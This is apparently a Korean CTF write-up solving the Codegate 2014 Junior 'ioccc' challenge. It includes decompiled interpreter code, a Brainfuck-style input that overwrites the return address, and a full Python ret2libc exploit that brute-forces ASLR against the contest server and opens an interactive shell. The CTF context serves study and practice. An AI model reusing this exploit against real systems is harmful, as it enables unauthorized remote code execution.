[Codegate 2014 Junior CTF] ioccc Reverse + Pwnable. 300Point.

python 파일은 왜 있는지 모르겠다. 이것 때문에 더 헤깔렸네ㅡㅡ..

리버싱을 해보면. ret를 바꿀 수 있는 부분을 찾을 수 있다. 코드가 복잡해보여서 그렇지 자세히 보면 그다지 어렵진 않다.

그런데, ASLR을 어떻게 우회할 지 방법을 모르겠다. 그래서 그냥 brute force로 하기로......

생각보다 빨리 결과가 나온다..ㅎㅎ

unsigned char arg2[4001]={0,},arg1[4001]={0,},arg3[4001]={0,};

read( 0,arg1,4000);

_f(arg1,arg2,(unsigned long*)arg3,0,0,0,0,100000,0,0);

void __cdecl f(char *inbuf, char *buf2, int *buf3, int *index_ptr, int *depth_ptr, int a6, int index, int remain, unsigned int cnt, int depth)
{
    size_t buflen; // eax@34

    if ( index_ptr )
    {
        if ( depth_ptr )
        {
            if ( *depth_ptr )
            {
                ++*index_ptr;
                if ( *index_ptr < strlen(inbuf) )
                {
                    if ( inbuf[*index_ptr] == ']' )
                        --*depth_ptr;
                    if ( inbuf[*index_ptr] == '[' )
                        ++*depth_ptr;
                    f(inbuf, buf2, buf3, index_ptr, depth_ptr, a6, index, remain, cnt, depth);
                }
            }
        }
    }
    if ( !index_ptr || !depth_ptr )
    {
        if ( inbuf[index] == '<' )
            --a6;
        if ( inbuf[index] == '>' )
            ++a6;
        if ( inbuf[index] == '+' )
            ++buf2[a6];
        if ( inbuf[index] == '-' )
            --buf2[a6];
        if ( inbuf[index] == '.' )
            write(1, &buf2[a6], 1u);
        if ( inbuf[index] == ',' )
            read(0, &buf2[a6], 1u);
        if ( inbuf[index] == ']' && cnt )
        {
            if ( !buf2[a6] )
                --cnt;
            index = buf3[cnt];
        }
        if ( inbuf[index] == '[' )
        {
            depth = 1;
            if ( buf2[a6] )
            {
                if ( cnt <= 999 )
                {
                    ++cnt;
                    buf3[cnt] = index;
                }
            }
            else
            {
                f(inbuf, buf2, buf3, &index, &depth, a6, index, remain, cnt, depth);
            }
        }
        ++index;
        buflen = strlen(inbuf);
        if ( buflen > index )
        {
            --remain;
            if ( remain )
                f(inbuf, buf2, buf3, index_ptr, depth_ptr, a6, index, remain, cnt, depth);
        }
    }
}

stack...

f function [sfp][ret][argu(40byte)][16byte dummy][buf2][inbuf][buf3]

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>

이런식으로 하면 일단 RET는 덮어써진다.
ASLR을 어떻게 우회할 수 있을까?..그냥 brute force 해볼까?..

v

#!/usr/bin/python
#cmd_sub.py

import sys
import os
import time
import popen2
import struct
import subprocess

def run_command(command):
    p = subprocess.Popen(command, shell=True,
            stdin=subprocess.PIPE,
            )
    return p
    #return p.communicate()

def execute(cmd) :
    std_out, std_in, std_err = popen2.popen3(cmd)
    return std_in, std_out, std_err

#cmd = ["./ioccc_fa20522ed15c4956e18388ac02b7c951"]
cmd = ["nc 58.229.183.22 1234"]

count = 0
while 1 :
	print "try ", count
	count += 1
	#std_in, std_out, std_err = execute(cmd)
	p = run_command(cmd)
	std_in = p.stdin

	randombase = 0xb75a2000
	dbase = 0xb7e13000
	payload = (
		struct.pack("<L", 0xb7ecee40 - dbase + randombase) +
		struct.pack("<L", 0xb7ece450 - dbase + randombase) +
		struct.pack("<L", 0xb7f7db98 - dbase + randombase) 
	)
	#payload = "\xb7\xec\xee\x40\xb7\xec\xe4\x50\xb7\xf7\xdb\x98\x00\x00\x00\x00"

	std_in.write("<"*61+",>"*len(payload)+"\n")
	std_in.flush()

	time.sleep(0.2)
	std_in.write(payload)
	std_in.flush()

	br = 0
	for i in range(0,30) :
		time.sleep(0.1)
		try :
			std_in.write("ls -al . ..\n")
		except :
			br = 1
			break
	if br == 1 :
		continue

	while 1:
		line =sys.stdin.readline()
		std_in.write(line)
		std_in.write("\n")
		std_in.flush()